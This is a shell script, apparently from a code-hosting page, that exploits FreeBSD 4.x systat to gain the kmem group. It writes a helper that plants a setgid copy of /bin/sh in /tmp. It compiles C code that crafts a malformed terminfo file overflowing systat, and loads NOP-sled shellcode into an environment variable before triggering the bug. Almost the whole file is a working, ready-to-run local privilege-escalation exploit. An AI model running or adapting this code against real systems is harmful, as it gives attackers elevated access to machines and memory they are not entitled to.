/
systat.sh
101 lines (76 loc) · 2.86 KB
/
systat.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/bin/tcsh
##############################################################################
# (c) 2000 Przemys³aw Frasunek <venglin@freebsd.lublin.pl> #
# #
# FreeBSD 4.x systat (gid=kmem) trivial exploit #
# Idea by: Jouko Pynnönen <jouko@SOLUTIONS.FI> #
# #
# Dedicated to ksm. #
# #
# Nudzi³o mi siê w szkole, tote¿ napisa³em sploita na angielskim. :) #
##############################################################################
# $Id: systat.sh,v 1.1.1.1 2001/05/21 15:28:06 venglin Exp $
echo "Preparing /tmp/xx..."
cat << __EOF__ > /tmp/xx
#!/bin/csh
cp /bin/sh /tmp
/usr/bin/chgrp kmem /tmp/sh
chmod 2755 /tmp/sh
__EOF__
chmod 755 /tmp/xx
echo "Compiling exploit..."
cat << __EOF__ > /tmp/sploitte.c
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#define OFF -400
#define ALIGN 516
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(void)
{
/* precompiled malformed terminfo header */
char evilcap[] =
"\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65"
"\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58"
"\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72"
"\x6d\x69\x6e\x61\x6c";
long ret = getesp() + OFF;
int i;
/* creating ~/.terminfo/s/screen precompiled binary */
write(2, evilcap, sizeof(evilcap)-1);
for (i=0;i<39;i++) write(2, "\0", 1);
for (i=0;i<86;i++) write(2, "\xff", 1);
write(2, "\0\0", 2);
for (i=0;i<750;i++) write(2, "\xff", 1);
for (i=0;i<ALIGN;i++) write(2, "a", 1);
fprintf(stderr, "%c%c%c%c", ((int)ret & 0xff),
(((int)ret & 0xff00) >> 8),
(((int)ret & 0xff0000) >> 16),
(((int)ret & 0xff000000) >> 24));
write(2, "\0", 1);
}
__EOF__
# creating terminfo binary
cc -o /tmp/s /tmp/sploitte.c
echo "Creating evil terminfo binary..."
cd $HOME
mkdir -p .terminfo/s
setenv TERM screen
/tmp/s >& .terminfo/s/screen
# shellcode goes to env. plenty of nops are used, so usually adjusting offset
# isn't needed.
echo "Preparing shellcode in env..."
setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`
# boom.
echo "Running systat. If script will stop here, this system is not vulnerable."
/usr/bin/systat >& /dev/null
# clean me up.
echo "Cleaning up..."
rm -f .terminfo/s/screen
rm -f /tmp/xx /tmp/s /tmp/sploitte.c
# your setgid shell :)
echo "Done."
ls -la /tmp/sh